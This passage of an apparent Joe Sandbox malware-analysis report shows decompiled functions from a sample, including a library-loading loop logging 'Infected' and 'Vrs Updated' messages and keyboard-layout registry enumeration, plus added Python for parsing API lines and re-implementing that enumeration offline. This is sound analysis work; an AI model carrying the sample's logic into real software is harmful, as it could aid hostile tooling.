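The API reference lines in these listings (`Name.MODULE(args), ref: address`, with `Part of subcall function NNNNNNNN:` on indirect calls and no argument list on calls such as `GetTickCount.KERNEL32 ref: ...`) are the quickest handle for triage: an address-ordered index of imported APIs per function lets a reviewer jump straight to loader or persistence calls. The parser below is an added example for this report format, not code from Joe Sandbox or from the sample; the line shapes it assumes are exactly the ones shown in the APIs blocks on this page, and the sample input is constructed by copying those lines.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: API reference lines copied verbatim from the listings on this page.
SAMPLE = """\
• InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 0044AB0C
• GetVersion.KERNEL32(00000000,0044ABBB), ref: 0044A9FC
  • Part of subcall function 0044AE70: CreatePopupMenu.USER32(?,0044AB77,00000000,00000000,0044ABBB), ref: 0044AE8B
• LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477780
• GetTickCount.KERNEL32 ref: 00442CBA
"""

# One bullet line: optional subcall prefix, Api.MODULE, optional (args), then "ref: <8 hex digits>".
API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox could not resolve the value ('?')
    ref: int                    # address of the call site
    subcall: Optional[int] = None   # address of the callee when the API is reached indirectly


def parse_arg(tok: str) -> Optional[int]:
    """'?' means the value was not captured; everything else is hex as printed in the report."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API bullet line in `text`; lines that do not match are skipped, not guessed."""
    refs = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = [] if not raw_args else [parse_arg(a) for a in raw_args.split(",")]
        refs.append(ApiRef(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("subcall"), 16) if m.group("subcall") else None,
        ))
    return refs


def index_by_module(refs: List[ApiRef]) -> dict:
    """module -> call sites sorted by address, so LoadLibrary/FreeLibrary pairs and the like
    line up in code order when reviewing a function."""
    out = {}
    for r in refs:
        out.setdefault(r.module, []).append((r.ref, r.api))
    for sites in out.values():
        sites.sort()
    return out


if __name__ == "__main__":
    for module, sites in index_by_module(parse_api_lines(SAMPLE)).items():
        print(module, [(hex(a), n) for a, n in sites])
```

Unmatched lines are dropped rather than partially parsed, so a `Strings` or `Memory Dump Source` line mixed into the input cannot produce a bogus call-site record; the `?` placeholders are kept as `None` so downstream checks do not mistake an uncaptured argument for a zero.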

                                                    C-Code - Quality: 79%
                                                    			E004776D4(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8) {
                                                    				void* _v8;
                                                    				intOrPtr _v12;
                                                    				char _v16;
                                                    				intOrPtr _v20;
                                                    				char _v24;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				char _v40;
                                                    				intOrPtr _v44;
                                                    				char _v48;
                                                    				intOrPtr _v52;
                                                    				char _v56;
                                                    				intOrPtr _v60;
                                                    				char _v64;
                                                    				char _v68;
                                                    				void* __ecx;
                                                    				void* _t95;
                                                    				char _t96;
                                                    				struct HINSTANCE__* _t107;
                                                    				struct HINSTANCE__* _t109;
                                                    				void* _t112;
                                                    				struct HINSTANCE__* _t113;
                                                    				struct HINSTANCE__* _t132;
                                                    				intOrPtr _t156;
                                                    				intOrPtr _t180;
                                                    				intOrPtr _t191;
                                                    				intOrPtr _t205;
                                                    				intOrPtr _t206;
                                                    				intOrPtr _t210;
                                                    
                                                    				_t203 = __esi;
                                                    				_t202 = __edi;
                                                    				_t205 = _t206;
                                                    				_t156 = 7;
                                                    				do {
                                                    					_push(0);
                                                    					_push(0);
                                                    					_t156 = _t156 - 1;
                                                    				} while (_t156 != 0);
                                                    				_push(_t156);
                                                    				_t1 =  &_v8;
                                                    				 *_t1 = _t156;
                                                    				_push(__ebx);
                                                    				_push(__esi);
                                                    				_push(__edi);
                                                    				_v16 =  *_t1;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				E00404E70(_v12);
                                                    				E00404E70(_v16);
                                                    				_push(_t205);
                                                    				_push(0x4778dd);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t206;
                                                    				if( *((intOrPtr*)( *_v8 + 0x14))() - 1 < 0) {
                                                    					L13:
                                                    					_pop(_t180);
                                                    					 *[fs:eax] = _t180;
                                                    					_push(0x4778e4);
                                                    					E004049E4( &_v68, 0xb);
                                                    					return E004049E4( &_v16, 2);
                                                    				}
                                                    				_t95 =  *((intOrPtr*)( *_v8 + 0x14))() - 1;
                                                    				if(_t95 < 0) {
                                                    					goto L13;
                                                    				}
                                                    				_t96 = _t95 + 1;
                                                    				_t210 = _t96;
                                                    				_v24 = _t96;
                                                    				_v20 = 0;
                                                    				do {
                                                    					 *((intOrPtr*)( *_v8 + 0xc))();
                                                    					if(E00409A48(_v28, _t210) != 0) {
                                                    						 *[fs:eax] = _t206;
                                                    						_t146 =  *_v8;
                                                    						 *((intOrPtr*)( *_v8 + 0xc))( *[fs:eax], 0x47789f, _t205);
                                                    						 *0x49ec78 = LoadLibraryA(E00404E80(_v32));
                                                    						_t107 =  *0x49ec78; // 0x0
                                                    						if(E004770E4(_t107,  *_v8, _v16, _t202, _t203) != 0) {
                                                    							_t109 =  *0x49ec78; // 0x0
                                                    							E0047717C(_t109, _t146,  &_v48, _v16, _t202, _t203);
                                                    							_t112 = E00409628(_v48, _t205, __eflags);
                                                    							__eflags = _t112 - _a8;
                                                    							if(_t112 >= _a8) {
                                                    								_t113 =  *0x49ec78; // 0x0
                                                    								FreeLibrary(_t113);
                                                    								 *((intOrPtr*)( *_v8 + 0xc))();
                                                    								E00404CCC( &_v64, _v68, "Infected Canceled -> ");
                                                    								 *((intOrPtr*)( *_v8 + 0x20))();
                                                    							} else {
                                                    								 *((intOrPtr*)( *_v8 + 0xc))();
                                                    								E004774A8(_v52,  *_v8, _v12, _t202, _t203, 1);
                                                    								 *((intOrPtr*)( *_v8 + 0xc))();
                                                    								E00404CCC( &_v56, _v60, "Vrs Updated -> ");
                                                    								 *((intOrPtr*)( *_v8 + 0x20))();
                                                    							}
                                                    						} else {
                                                    							_t132 =  *0x49ec78; // 0x0
                                                    							FreeLibrary(_t132);
                                                    							 *((intOrPtr*)( *_v8 + 0xc))();
                                                    							E004774A8(_v36,  *_v8, _v12, _t202, _t203, 0);
                                                    							 *((intOrPtr*)( *_v8 + 0xc))();
                                                    							E00404CCC( &_v40, _v44, "Completed -> ");
                                                    							 *((intOrPtr*)( *_v8 + 0x20))();
                                                    						}
                                                    						_pop(_t191);
                                                    						 *[fs:eax] = _t191;
                                                    					}
                                                    					_v20 = _v20 + 1;
                                                    					_t75 =  &_v24;
                                                    					 *_t75 = _v24 - 1;
                                                    				} while ( *_t75 != 0);
                                                    				goto L13;
                                                    			}
                                                    0x004776d4
                                                    0x004776d4
                                                    0x004776d5
                                                    0x004776d8
                                                    0x004776dd
                                                    0x004776dd
                                                    0x004776df
                                                    0x004776e1
                                                    0x004776e1
                                                    0x004776e4
                                                    0x004776e5
                                                    0x004776e5
                                                    0x004776e8
                                                    0x004776e9
                                                    0x004776ea
                                                    0x004776eb
                                                    0x004776ee
                                                    0x004776f1
                                                    0x004776f7
                                                    0x004776ff
                                                    0x00477706
                                                    0x00477707
                                                    0x0047770c
                                                    0x0047770f
                                                    0x0047771b
                                                    0x004778b5
                                                    0x004778b7
                                                    0x004778ba
                                                    0x004778bd
                                                    0x004778ca
                                                    0x004778dc
                                                    0x004778dc
                                                    0x00477729
                                                    0x0047772c
                                                    0x00000000
                                                    0x00000000
                                                    0x00477732
                                                    0x00477732
                                                    0x00477733
                                                    0x00477736
                                                    0x0047773d
                                                    0x00477748
                                                    0x00477755
                                                    0x00477766
                                                    0x00477772
                                                    0x00477774
                                                    0x00477785
                                                    0x0047778d
                                                    0x00477799
                                                    0x004777fb
                                                    0x00477800
                                                    0x00477808
                                                    0x0047780d
                                                    0x00477810
                                                    0x0047785e
                                                    0x00477864
                                                    0x00477874
                                                    0x00477882
                                                    0x00477892
                                                    0x00477812
                                                    0x0047781f
                                                    0x0047782b
                                                    0x0047783b
                                                    0x00477849
                                                    0x00477859
                                                    0x00477859
                                                    0x0047779b
                                                    0x0047779b
                                                    0x004777a1
                                                    0x004777b3
                                                    0x004777bf
                                                    0x004777cf
                                                    0x004777dd
                                                    0x004777ed
                                                    0x004777ed
                                                    0x00477897
                                                    0x0047789a
                                                    0x0047789a
                                                    0x004778a9
                                                    0x004778ac
                                                    0x004778ac
                                                    0x004778ac
                                                    0x00000000

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477780
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 004777A1
                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,?,?,?,00000006,00000000,00000000), ref: 00477864
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Library$Free$Load
                                                    • String ID: Completed -> $Infected Canceled -> $Vrs Updated ->
                                                    • API String ID: 2391024519-3592865843
                                                    • Opcode ID: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                    • Instruction ID: 17185f43945d3bc0c2e5cc5bb4bd267fdef97e65ffff577caacc568d39ef9c26
                                                    • Opcode Fuzzy Hash: e5ca2df3611e2abfeeb87632b8b91ed25a998eaf615441498497ba08c9cca89b
                                                    • Instruction Fuzzy Hash: 32611878A04209DFDB04EFA5C8849EEB7B5FF48300F6180A6E904A7351CB34AE05CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00442BD0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                    				intOrPtr* _v8;
                                                    				void _v12;
                                                    				intOrPtr _v16;
                                                    				int _v24;
                                                    				int _v28;
                                                    				intOrPtr _v32;
                                                    				char _v36;
                                                    				intOrPtr* _t80;
                                                    				intOrPtr _t91;
                                                    				void* _t119;
                                                    				intOrPtr _t136;
                                                    				intOrPtr _t145;
                                                    				void* _t148;
                                                    
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				_t119 = __ecx;
                                                    				_v8 = __eax;
                                                    				_t145 =  *0x49de0c; // 0x49ebbc
                                                    				 *((char*)(_v8 + 0x210)) = 1;
                                                    				_push(_t148);
                                                    				_push(0x442da9);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t148 + 0xffffffe0;
                                                    				E0043AFAC(_v8, __ecx, __ecx, _t145);
                                                    				_v16 = _v16 + 4;
                                                    				E0043C1D4(_v8,  &_v28);
                                                    				if(E00458218() <  *(_v8 + 0x4c) + _v24) {
                                                    					_v24 = E00458218() -  *(_v8 + 0x4c);
                                                    				}
                                                    				if(E00458224() <  *(_v8 + 0x48) + _v28) {
                                                    					_v28 = E00458224() -  *(_v8 + 0x48);
                                                    				}
                                                    				if(E0045820C() > _v28) {
                                                    					_v28 = E0045820C();
                                                    				}
                                                    				if(E00458200() > _v16) {
                                                    					_v16 = E00458200();
                                                    				}
                                                    				SetWindowPos(E00441704(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
                                                    				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404C80(_t119) < 0x64 &&  *0x49bc1c != 0) {
                                                    					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
                                                    					if(_v12 != 0) {
                                                    						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
                                                    						if(_v12 == 0) {
                                                    							L00445E24( &_v36);
                                                    							if(_v32 <= _v24) {
                                                    							}
                                                    						}
                                                    						 *0x49bc1c(E00441704(_v8), 0x64,  *0x0049BD24 | 0x00040000);
                                                    					}
                                                    				}
                                                    				_t80 =  *0x49dbcc; // 0x49ebb8
                                                    				E0043EE38(_v8,  *((intOrPtr*)( *_t80 + 0x30)));
                                                    				ShowWindow(E00441704(_v8), 4);
                                                    				 *((intOrPtr*)( *_v8 + 0x7c))();
                                                    				_pop(_t136);
                                                    				 *[fs:eax] = _t136;
                                                    				_push(0x442db0);
                                                    				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
                                                    				_t91 = _v8;
                                                    				 *((char*)(_t91 + 0x210)) = 0;
                                                    				return _t91;
                                                    			}
                                                    0x00442bde
                                                    0x00442bdf
                                                    0x00442be0
                                                    0x00442be1
                                                    0x00442be2
                                                    0x00442be4
                                                    0x00442be7
                                                    0x00442bf0
                                                    0x00442bf9
                                                    0x00442bfa
                                                    0x00442bff
                                                    0x00442c02
                                                    0x00442c0a
                                                    0x00442c0f
                                                    0x00442c19
                                                    0x00442c30
                                                    0x00442c3f
                                                    0x00442c3f
                                                    0x00442c54
                                                    0x00442c63
                                                    0x00442c63
                                                    0x00442c70
                                                    0x00442c79
                                                    0x00442c79
                                                    0x00442c86
                                                    0x00442c8f
                                                    0x00442c8f
                                                    0x00442cb5
                                                    0x00442ccd
                                                    0x00442cf5
                                                    0x00442cfe
                                                    0x00442d0d
                                                    0x00442d16
                                                    0x00442d24
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d2f
                                                    0x00442d53
                                                    0x00442d53
                                                    0x00442cfe
                                                    0x00442d59
                                                    0x00442d66
                                                    0x00442d76
                                                    0x00442d80
                                                    0x00442d85
                                                    0x00442d88
                                                    0x00442d8b
                                                    0x00442d98
                                                    0x00442d9e
                                                    0x00442da1
                                                    0x00442da8

                                                    APIs
                                                    • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442CB5
                                                    • GetTickCount.KERNEL32 ref: 00442CBA
                                                    • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 00442CF5
                                                    • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 00442D0D
                                                    • AnimateWindow.USER32(00000000,00000064,00000001), ref: 00442D53
                                                    • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,00442DA9), ref: 00442D76
                                                      • Part of subcall function 00445E24: GetCursorPos.USER32(?,?,00442D29,00001018,00000000,00000000,00000000,00001016,00000000,?,00000000,00000000,000000FF,?,?,?), ref: 00445E28
                                                    • GetTickCount.KERNEL32 ref: 00442D90
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                    • String ID:
                                                    • API String ID: 3024527889-0
                                                    • Opcode ID: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction ID: ec947e6fb4e605e95c0b99b07f50ee8800e03fd8639e7176e4c102910f3e7fae
                                                    • Opcode Fuzzy Hash: 54a305cc09a56bb811332e01a25417af1ec60ed1c2f6bf35ac9e9272792253b9
                                                    • Instruction Fuzzy Hash: 1F513D74A00109DFEB10DF99C986E9EB7F5AF04304F6045AAF500EB395DB78AE40DB99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E00458464(intOrPtr __eax, void* __ebx, void* __fp0) {
                                                    				intOrPtr _v8;
                                                    				int _v12;
                                                    				void* _v16;
                                                    				char _v20;
                                                    				void* _v24;
                                                    				struct HKL__* _v280;
                                                    				char _v536;
                                                    				char _v600;
                                                    				char _v604;
                                                    				char _v608;
                                                    				char _v612;
                                                    				void* _t60;
                                                    				intOrPtr _t106;
                                                    				intOrPtr _t111;
                                                    				void* _t117;
                                                    				void* _t118;
                                                    				intOrPtr _t119;
                                                    				void* _t129;
                                                    
                                                    				_t129 = __fp0;
                                                    				_t117 = _t118;
                                                    				_t119 = _t118 + 0xfffffda0;
                                                    				_v612 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t117);
                                                    				_push(0x45860f);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t119;
                                                    				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
                                                    					L11:
                                                    					_pop(_t106);
                                                    					 *[fs:eax] = _t106;
                                                    					_push(0x458616);
                                                    					return E004049C0( &_v612);
                                                    				} else {
                                                    					 *((intOrPtr*)(_v8 + 0x34)) = L00403BBC(1);
                                                    					E004049C0(_v8 + 0x38);
                                                    					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
                                                    					if(_t60 < 0) {
                                                    						L10:
                                                    						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
                                                    						E0041D5D8( *((intOrPtr*)(_v8 + 0x34)), 1);
                                                    						goto L11;
                                                    					} else {
                                                    						_v20 = _t60 + 1;
                                                    						_v24 =  &_v280;
                                                    						do {
                                                    							if(E00446294( *_v24) == 0) {
                                                    								goto L9;
                                                    							} else {
                                                    								_v608 =  *_v24;
                                                    								_v604 = 0;
                                                    								if(RegOpenKeyExA(0x80000002, E0040A5E4( &_v600,  &_v608, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
                                                    									goto L9;
                                                    								} else {
                                                    									_push(_t117);
                                                    									_push(0x4585cb);
                                                    									_push( *[fs:eax]);
                                                    									 *[fs:eax] = _t119;
                                                    									_v12 = 0x100;
                                                    									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
                                                    										E00404C30( &_v612, 0x100,  &_v536);
                                                    										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
                                                    										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
                                                    											E00404C30(_v8 + 0x38, 0x100,  &_v536);
                                                    										}
                                                    									}
                                                    									_pop(_t111);
                                                    									 *[fs:eax] = _t111;
                                                    									_push(0x4585d2);
                                                    									return RegCloseKey(_v16);
                                                    								}
                                                    							}
                                                    							goto L12;
                                                    							L9:
                                                    							_v24 = _v24 + 4;
                                                    							_t38 =  &_v20;
                                                    							 *_t38 = _v20 - 1;
                                                    						} while ( *_t38 != 0);
                                                    						goto L10;
                                                    					}
                                                    				}
                                                    				L12:
                                                    			}

                                                    0x00458464
                                                    0x00458465
                                                    0x00458467
                                                    0x00458470
                                                    0x00458476
                                                    0x0045847b
                                                    0x0045847c
                                                    0x00458481
                                                    0x00458484
                                                    0x0045848e
                                                    0x004585f0
                                                    0x004585f8
                                                    0x004585fb
                                                    0x004585fe
                                                    0x0045860e
                                                    0x00458494
                                                    0x004584a3
                                                    0x004584ac
                                                    0x004584bf
                                                    0x004584c2
                                                    0x004585df
                                                    0x004585e5
                                                    0x004585eb
                                                    0x00000000
                                                    0x004584c8
                                                    0x004584c9
                                                    0x004584d2
                                                    0x004584d5
                                                    0x004584e1
                                                    0x00000000
                                                    0x004584e7
                                                    0x004584f9
                                                    0x004584ff
                                                    0x00458529
                                                    0x00000000
                                                    0x0045852f
                                                    0x00458531
                                                    0x00458532
                                                    0x00458537
                                                    0x0045853a
                                                    0x0045853d
                                                    0x00458563
                                                    0x00458576
                                                    0x0045858e
                                                    0x0045859c
                                                    0x004585af
                                                    0x004585af
                                                    0x0045859c
                                                    0x004585b6
                                                    0x004585b9
                                                    0x004585bc
                                                    0x004585ca
                                                    0x004585ca
                                                    0x00458529
                                                    0x00000000
                                                    0x004585d2
                                                    0x004585d2
                                                    0x004585d6
                                                    0x004585d6
                                                    0x004585d6
                                                    0x00000000
                                                    0x004584d5
                                                    0x004584c2
                                                    0x00000000

                                                    APIs
                                                    • GetKeyboardLayoutList.USER32(00000040,?,00000000,0045860F,?,00000000,?,00458671,00000000,?,0043D4D3), ref: 004584BA
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00458522
                                                    • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 0045855C
                                                    • RegCloseKey.ADVAPI32(?,004585D2,00000000,?,00000100,00000000,004585CB,?,80000002,00000000), ref: 004585C5
                                                    Strings
                                                    • layout text, xrefs: 00458553
                                                    • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 0045850C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                    • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                    • API String ID: 1703357764-2652665750
                                                    • Opcode ID: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction ID: 7c903f8fd9ad85d3247752ddaabe7f8220cad0ab59f1ef766b0bf81713acb4c4
                                                    • Opcode Fuzzy Hash: 8cc75bf8530aa7b8bc3295c685c4afb19f65476633fa01bc8007fe3bd1315606
                                                    • Instruction Fuzzy Hash: 7D415174A0420DAFDB10DF55C981B9EB7F8EB48305F5140EAE904B7352DB78AE04CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
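The routine above walks GetKeyboardLayoutList, formats each HKL into HKLM\System\CurrentControlSet\Control\Keyboard Layouts\%.8x, opens it with samDesired 0x20019 and reads the REG_SZ "layout text" value into a 0x100-byte buffer, remembering the name of the layout that matches the current one at offset 0x3c. The SEH-frame idiom (push [fs:eax] / mov [fs:eax], esp) and helpers like E004049C0 are characteristic of Delphi-compiled code, so this is best read as a runtime or library routine rather than sample-specific logic (an editorial observation; the report itself does not say so). The Python below is an added example, not code from the sample or from Joe Sandbox: it re-implements the loop against a constructed dictionary standing in for the registry so it runs offline, and decodes the access mask. The filter call E00446294 and the virtual call at +0x3c (assumed to add the string to a list) are not modelled; the HKL values and layout names in the stand-in are constructed.

```python
"""Offline re-implementation of the keyboard-layout enumeration in E00458464.
Added example; the real function calls GetKeyboardLayoutList, RegOpenKeyExA
and RegQueryValueExA. The registry contents below are constructed test data."""

HKEY_LOCAL_MACHINE = 0x80000002   # hKey in the RegOpenKeyExA call
KEY_READ = 0x20019                # samDesired in the listing
MAX_LAYOUTS = 0x40                # nBuff passed to GetKeyboardLayoutList
VALUE_BUF_LEN = 0x100             # cbData before RegQueryValueExA
LAYOUT_KEY_FMT = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
LAYOUT_TEXT_VALUE = "layout text"

# Rights bits that make up KEY_READ (winnt.h / winreg.h).
_KEY_RIGHTS = {
    0x20000: "STANDARD_RIGHTS_READ",
    0x0001: "KEY_QUERY_VALUE",
    0x0008: "KEY_ENUMERATE_SUB_KEYS",
    0x0010: "KEY_NOTIFY",
}

# Constructed stand-in for HKLM\...\Keyboard Layouts\<id>\"layout text".
# A real HKL packs a device handle in its high word, so not every value
# returned by GetKeyboardLayoutList resolves to a key under this path.
FAKE_REGISTRY = {
    LAYOUT_KEY_FMT % 0x00000409: "US",
    LAYOUT_KEY_FMT % 0x00000419: "Russian",
    LAYOUT_KEY_FMT % 0x00000407: "German",
}


def decode_sam(sam):
    """Name the access rights present in a samDesired mask."""
    return sorted(name for bit, name in _KEY_RIGHTS.items() if sam & bit)


def layout_key_path(hkl):
    """Format the subkey exactly as the sample's '%.8x' does: unsigned, 8 hex digits."""
    return LAYOUT_KEY_FMT % (hkl & 0xFFFFFFFF)


def split_hkl(hkl):
    """Split an HKL into device handle (high word) and LANGID (low word);
    the LANGID itself is a 10-bit primary language plus a 6-bit sublanguage."""
    langid = hkl & 0xFFFF
    return {
        "device": (hkl >> 16) & 0xFFFF,
        "langid": langid,
        "primary_lang": langid & 0x3FF,
        "sublang": langid >> 10,
    }


def enumerate_layout_names(layout_list, current_hkl, registry=FAKE_REGISTRY):
    """Mirror of the decompiled loop: for every HKL open the layout key read-only,
    read 'layout text', collect it, and keep the name of the current layout.
    A missing key plays the role of RegOpenKeyExA / RegQueryValueExA failing
    (the jump to L9 in the listing). Returns (all_names, current_name)."""
    names = []
    current_name = None
    for hkl in layout_list[:MAX_LAYOUTS]:
        text = registry.get(layout_key_path(hkl))
        if text is None:
            continue
        text = text[:VALUE_BUF_LEN]
        names.append(text)
        if hkl == current_hkl:
            current_name = text
    return names, current_name
```

Run against the stand-in with a layout list that includes an IME-style HKL such as 0xE0010412 (constructed), and that entry is skipped exactly as an open failure would be; on a live host the same loop, pointed at winreg, tells you which layout names the sample would have collected.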

                                                    C-Code - Quality: 71%
                                                    			E004288B4(void* __eax, void* __edx) {
                                                    				BYTE* _v8;
                                                    				int _v12;
                                                    				struct HDC__* _v16;
                                                    				short _v18;
                                                    				signed int _v24;
                                                    				short _v26;
                                                    				short _v28;
                                                    				char _v38;
                                                    				void* __ebx;
                                                    				void* __ebp;
                                                    				signed int _t35;
                                                    				void* _t66;
                                                    				intOrPtr _t68;
                                                    				intOrPtr _t78;
                                                    				void* _t81;
                                                    				void* _t84;
                                                    				void* _t86;
                                                    				intOrPtr _t87;
                                                    
                                                    				_t84 = _t86;
                                                    				_t87 = _t86 + 0xffffffdc;
                                                    				_t81 = __edx;
                                                    				_t66 = __eax;
                                                    				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
                                                    					return __eax;
                                                    				} else {
                                                    					E004032B4( &_v38, 0x16);
                                                    					_t68 =  *((intOrPtr*)(_t66 + 0x28));
                                                    					_v38 = 0x9ac6cdd7;
                                                    					_t35 =  *((intOrPtr*)(_t68 + 0x18));
                                                    					if(_t35 != 0) {
                                                    						_v24 = _t35;
                                                    					} else {
                                                    						_v24 = 0x60;
                                                    					}
                                                    					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                                    					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                                    					_v18 = E00426DA8( &_v38);
                                                    					_v16 = GetDC(0);
                                                    					_push(_t84);
                                                    					_push(0x4289ef);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t87;
                                                    					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                                                    					_v8 = E0040275C(_v12);
                                                    					_push(_t84);
                                                    					_push(0x4289cf);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t87;
                                                    					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                                                    						L00425FB8(_t68);
                                                    					}
                                                    					L0041D904(_t81, 0x16,  &_v38);
                                                    					L0041D904(_t81, _v12, _v8);
                                                    					_pop(_t78);
                                                    					 *[fs:eax] = _t78;
                                                    					_push(0x4289d6);
                                                    					return E0040277C(_v8);
                                                    				}
                                                    			}

                                                    0x004288b5
                                                    0x004288b7
                                                    0x004288bc
                                                    0x004288be
                                                    0x004288c4
                                                    0x004289fb
                                                    0x004288ca
                                                    0x004288d4
                                                    0x004288d9
                                                    0x004288dc
                                                    0x004288e3
                                                    0x004288ea
                                                    0x004288f4
                                                    0x004288ec
                                                    0x004288ec
                                                    0x004288ec
                                                    0x0042890b
                                                    0x00428922
                                                    0x0042892e
                                                    0x00428939
                                                    0x0042893e
                                                    0x0042893f
                                                    0x00428944
                                                    0x00428947
                                                    0x0042895d
                                                    0x00428968
                                                    0x0042896d
                                                    0x0042896e
                                                    0x00428973
                                                    0x00428976
                                                    0x00428993
                                                    0x00428995
                                                    0x00428995
                                                    0x004289a4
                                                    0x004289b1
                                                    0x004289b8
                                                    0x004289bb
                                                    0x004289be
                                                    0x004289ce
                                                    0x004289ce

                                                    APIs
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 00428906
                                                    • MulDiv.KERNEL32(?,?,000009EC), ref: 0042891D
                                                    • GetDC.USER32(00000000), ref: 00428934
                                                    • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,004289EF,?,00000000,?,?,000009EC,?,?,000009EC), ref: 00428958
                                                    • GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,004289CF,?,?,00000000,00000000,00000008,?,00000000,004289EF), ref: 0042898B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: BitsFileMeta
                                                    • String ID: `
                                                    • API String ID: 858000408-2679148245
